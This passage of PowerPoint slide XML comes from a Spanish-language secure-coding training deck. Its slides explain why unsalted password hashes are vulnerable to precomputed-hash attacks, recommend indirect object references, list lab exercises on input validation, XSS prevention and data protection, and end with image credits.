            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4615430" y="4100645"/>
            <a:ext cx="1050288" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Brecha de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Curved Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24BC77C3-685E-0E43-B15B-A20EA9FF91F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4805878" y="3356954"/>
            <a:ext cx="1522802" cy="727525"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15805"/>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Table 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C19FCB7-532C-BC4F-A5E6-AE42EE5AF7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3412063704"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518029" y="4360300"/>
          <a:ext cx="2744901" cy="1280160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="933190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="669773">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1141938">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>value</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>md5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>sha256</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1283997765"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>BB74…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E9A92A2…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69026FA9-52F8-EC4D-AA8E-D6D4746E6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812812" y="3990968"/>
            <a:ext cx="2074607" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Hashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1"/>
              <a:t>precomputados</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EFD92E2-C672-5C44-B2A5-BB3855481940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6597840" y="738586"/>
            <a:ext cx="4574142" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Si los hashes de las contraseñas no utilizan una sal, atacantes pueden determinarlas probando distintos valores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>precomputados</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{788F0481-5ABD-EB31-5255-EFED6DCF9055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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UY" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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8667987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216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>En resumen…</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type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reduzca la superficie de ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>accediendo a los objetos a través de identificadores en vez de la representación real.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Los identificadores son fácilmente validables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>como entradas de datos. Esto también soluciona problemas de codificación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334326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38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272F1E-58A5-DCED-7B90-9E17CF7742BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386768" y="290700"/>
            <a:ext cx="9640135" cy="5639289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100042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74D1-8F02-FE6A-E29D-B496242FE114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Desafíos para hoy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E1DB57-95AB-9219-2CEE-1CB6609F3154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>:8081</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Ninja </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Input Validation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Protecting Data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Preventing Cross-Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Indirect Object References </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Belt</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>¡Tan lejos como puedas hoy!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10096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911DB-8A29-1944-8DE2-A35F5350BD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="123545"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Créditos de las imágenes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE49923-874C-4145-AA56-4D7B19A488D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1328635"/>
            <a:ext cx="10515600" cy="4932316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>8212733 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/woman-laptop-business-blogging-3190829/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Janson_G - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/knight-crusader-isolated-2939429/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mohamed_hassan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/europe-gdpr-data-privacy-3256079</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pexels - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Photo Mix - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PublicDomainPictures - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/board-card-chip-computer-data-22098/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MTZD - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/vectors/icon-file-extension-document-2488093/</a:t>
            </a:r>
